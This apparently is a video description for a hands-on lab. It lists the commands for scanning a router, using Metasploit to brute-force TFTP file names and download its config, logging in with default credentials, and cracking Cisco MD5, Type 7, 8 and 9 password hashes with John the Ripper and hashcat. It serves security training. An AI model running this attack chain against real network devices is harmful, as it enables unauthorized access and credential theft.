Project 20 - Hash Cracking w/ John The Ripper and Hashcat!

Описание: Commands used (in the order they appear in the video)

1. sudo su

2. Enter Password

3. arp-scan --localnet

4. nmap 172.20.1.101

5. nmap -sU 172.20.1.101 -p 69 (UDP scan on TFTP port 69)

Trivaial File Transfer Protocol - a simple protocol commonly used to transfer small configuration files to network devices like routers and switches.

6. tftp 172.20.1.101 (TFTP is cleartext, lacks authentication, and encryption. Since it lacks its own commands list files, lets use Metasploit to scan for some.)

7. quit

8. msfconsole (to start up metasploit framework)

9. search tftpbrute

10. use auxiliary/scanner/tftp/tftpbrute

11. show options (to see that the remote host needs to be set)

12. set RHOSTS 172.20.1.101

13. run (2 files will appear, remote-config and test.txt)

14. exit

15. tftp 172.20.1.101

16. get test.txt

17. get remote-config

18. quit

19. ls

20. cat remote-config (scroll up to see username: admin , password: admin)

21. ssh [email protected]

22. enable (to enter priviliage EXEC mode)

23. configure terminal

24. enable password test

25. exit x 2

26. enable (password: test)

27. show running-config (scroll up to see username: cisco , password: cisco)

28. configure terminal

29. enable secret P@ssw0rd (to generate MD5 hash value of P@ssw0rd)

30. enable secret level 5 P@ssw0rd (does the same thing)

31. show running-config (scroll up to see secret level 5 password hash)

32. exit

33. enable (password: test, should fail, P@ssw0rd)

34. exit x2

35. echo "\$1\$mERr\$uPOU5aamVaETEvWzvDbvp." greater than hash.txt (copy and paste this to terminal to store output to new hash.txt file)

36. hashid hash.txt (gives us the information about the hash algorithm contained in the file)

Using John The Ripper and hashcat to crack MD5 passwords

37. john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt (to conducts a dictionary attack using commonly used password hashes against target hash in order to cause a collition, revealing the plain text password)

38. john -show hash.txt (shows cracked passwords)

39. hashcat -a 0 -m 500 hash.txt /usr/share/wordlists/rockyou.txt --show (runs hash cat and outputs cracked password)

Using Python script to crack Type 7 Password (used by Cisco routers)

40. cat remote-config

41. Scroll up to see Type 7 Password

42. cd /brute-force

43. python3 ciscot7.py -d -p 01150F165E1C07032D

44. cd / (to got back to root directory)

45. cat /hashes/type_8.hash (to see type 8 cipher text)

46. hashcat -m 9200 -a 0 /hashes/type_8.hash /usr/share/wordlists/rockyou.txt --show (runs hash cat and outputs cracked password)

46. cat /hashes/type_9.hash (to see type 9 cipher text)

47. hashcat -m 9300 -a 0 --force /hashes/type_9.hash /usr/share/wordlists/rockyou.txt --show (runs hash cat and outputs cracked password)